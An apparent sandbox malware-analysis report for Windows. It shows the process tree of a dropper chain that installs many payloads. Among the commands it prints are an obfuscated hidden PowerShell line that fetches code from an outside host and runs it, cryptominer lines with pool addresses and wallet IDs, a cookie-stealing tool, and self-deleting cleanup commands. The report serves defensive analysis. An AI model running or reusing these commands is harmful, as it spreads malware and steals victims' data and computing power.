C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"14⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe15⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 6300 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 630014⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 314⤵
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"11⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3v0ugtxz4vz\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\3v0ugtxz4vz\KiffApp1.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\GveMnyUS1.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\GveMnyUS1.exe"9⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe10⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe10⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cihyycpbzsc\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\cihyycpbzsc\cpyrix.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3y33p3b12wb\i34ty55ac1m.exe"C:\Users\Admin\AppData\Local\Temp\3y33p3b12wb\i34ty55ac1m.exe" /ustwo INSTALL8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 6609⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 7129⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 6929⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 6729⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 8849⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 9329⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 8849⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\1h1aepggrzj\mzbjrq2myxq.exe"C:\Users\Admin\AppData\Local\Temp\1h1aepggrzj\mzbjrq2myxq.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KC85Q.tmp\mzbjrq2myxq.tmp"C:\Users\Admin\AppData\Local\Temp\is-KC85Q.tmp\mzbjrq2myxq.tmp" /SL5="$502EE,2592217,780800,C:\Users\Admin\AppData\Local\Temp\1h1aepggrzj\mzbjrq2myxq.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DA71N.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-DA71N.tmp\winlthsth.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\y315awvDL.exe"C:\Users\Admin\AppData\Local\Temp\y315awvDL.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\y315awvDL.exe"C:\Users\Admin\AppData\Local\Temp\y315awvDL.exe"12⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yeifmpemjo4\app.exe"C:\Users\Admin\AppData\Local\Temp\yeifmpemjo4\app.exe" /8-238⤵
-
C:\Users\Admin\AppData\Local\Temp\yeifmpemjo4\app.exe"C:\Users\Admin\AppData\Local\Temp\yeifmpemjo4\app.exe" /8-239⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\p1oqsuott4r\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\p1oqsuott4r\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BIV1U.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-BIV1U.tmp\IBInstaller_97039.tmp" /SL5="$203F6,12322324,721408,C:\Users\Admin\AppData\Local\Temp\p1oqsuott4r\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
-
-
C:\Users\Admin\AppData\Local\Temp\is-MBH1C.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-MBH1C.tmp\{app}\chrome_proxy.exe"10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-MBH1C.tmp\{app}\chrome_proxy.exe"11⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\25o4xgwptww\lp0p4ezhjdl.exe"C:\Users\Admin\AppData\Local\Temp\25o4xgwptww\lp0p4ezhjdl.exe" /quiet SILENT=1 AF=7568⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\25o4xgwptww\lp0p4ezhjdl.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\25o4xgwptww\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617145068 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\qqpwojnys1c\vpn.exe"C:\Users\Admin\AppData\Local\Temp\qqpwojnys1c\vpn.exe" /silent /subid=4828⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DFI7U.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-DFI7U.tmp\vpn.tmp" /SL5="$10460,15170975,270336,C:\Users\Admin\AppData\Local\Temp\qqpwojnys1c\vpn.exe" /silent /subid=4829⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uu2sgt4pqnc\vu4n0bm3yup.exe"C:\Users\Admin\AppData\Local\Temp\uu2sgt4pqnc\vu4n0bm3yup.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\uu2sgt4pqnc\vu4n0bm3yup.exe"9⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kvqkw4pzaha\vict.exe"C:\Users\Admin\AppData\Local\Temp\kvqkw4pzaha\vict.exe" /VERYSILENT /id=5358⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CA188.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-CA188.tmp\vict.tmp" /SL5="$30486,870426,780800,C:\Users\Admin\AppData\Local\Temp\kvqkw4pzaha\vict.exe" /VERYSILENT /id=5359⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ACOG1.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-ACOG1.tmp\win1host.exe" 53510⤵
-
C:\Users\Admin\AppData\Local\Temp\rSbaAa1hB.exe"C:\Users\Admin\AppData\Local\Temp\rSbaAa1hB.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\rSbaAa1hB.exe"C:\Users\Admin\AppData\Local\Temp\rSbaAa1hB.exe"12⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 66811⤵
- Program crash
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\U5I6BFWGIQ\setups.exe"C:\Users\Admin\AppData\Local\Temp\U5I6BFWGIQ\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-4SKV1.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-4SKV1.tmp\setups.tmp" /SL5="$20208,635399,250368,C:\Users\Admin\AppData\Local\Temp\U5I6BFWGIQ\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\D0A4.tmp.exe"C:\Users\Admin\AppData\Roaming\D0A4.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\D0A4.tmp.exe"C:\Users\Admin\AppData\Roaming\D0A4.tmp.exe"6⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\D354.tmp.exe"C:\Users\Admin\AppData\Roaming\D354.tmp.exe"5⤵
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵
-
-
-
C:\Users\Admin\AppData\Roaming\D597.tmp.exe"C:\Users\Admin\AppData\Roaming\D597.tmp.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\D597.tmp.exe6⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\936823ec3902449bb7396e1b63a46eab /t 576 /p 48241⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 32A292950CE6D5D29A5657F244601EA7 C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4A19D265E53F0CCE105A8310CE5B94A42⤵
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\c41a53d1b0b64e199568e11e22691d65 /t 0 /p 49681⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{27f58da3-c84f-2f45-b8a8-da0c5ffd2912}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\3f5a519b939c4f9fab4d834dec600990 /t 2232 /p 21441⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
-
C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"2⤵
-
-
C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"2⤵
-
-
C:\Program Files (x86)\Advanced Trip\DreamTrip.exe"C:\Program Files (x86)\Advanced Trip\DreamTrip.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
-
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\aa815a19feaa422c9a6bd18037bebeda /t 6676 /p 50961⤵
-
C:\Users\Admin\AppData\Local\Temp\is-A8VCT.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-A8VCT.tmp\lylal220.tmp" /SL5="$50410,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-R5CHF.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-R5CHF.tmp\Microsoft.exe" /S /UID=lylal2202⤵
-
C:\Users\Admin\AppData\Local\Temp\2a-3444b-122-a02b0-408357ce320d2\Lipucudefe.exe"C:\Users\Admin\AppData\Local\Temp\2a-3444b-122-a02b0-408357ce320d2\Lipucudefe.exe"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nodsxw1k.qi1\md6_6ydj.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\nodsxw1k.qi1\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\nodsxw1k.qi1\md6_6ydj.exe5⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fbjc3q5q.2hv\askinstall31.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\fbjc3q5q.2hv\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\fbjc3q5q.2hv\askinstall31.exe5⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xq25qevs.qau\toolspab1.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\xq25qevs.qau\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\xq25qevs.qau\toolspab1.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\xq25qevs.qau\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\xq25qevs.qau\toolspab1.exe6⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\10dypswe.jam\setup_10.2_mix.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\10dypswe.jam\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\10dypswe.jam\setup_10.2_mix.exe5⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gvtjwz5p.xkf\GcleanerWW.exe /mixone & exit4⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\32iz10ad.txa\app.exe /8-2222 & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\32iz10ad.txa\app.exeC:\Users\Admin\AppData\Local\Temp\32iz10ad.txa\app.exe /8-22225⤵
-
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
172KB
-
Filesize
28KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
328KB
-
Filesize
272KB
-
Filesize
412KB
-
Filesize
272KB
-
Filesize
1.6MB
-
Filesize
956KB
-
Filesize
108KB
-
Filesize
4KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
44KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
4KB
-
Filesize
284KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
92KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
28KB
-
Filesize
5.5MB
-
Filesize
5.5MB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
4KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
492KB
-
Filesize
412KB
-
Filesize
412KB
-
Filesize
492KB
-
Filesize
6.9MB
-
Filesize
192KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
412KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
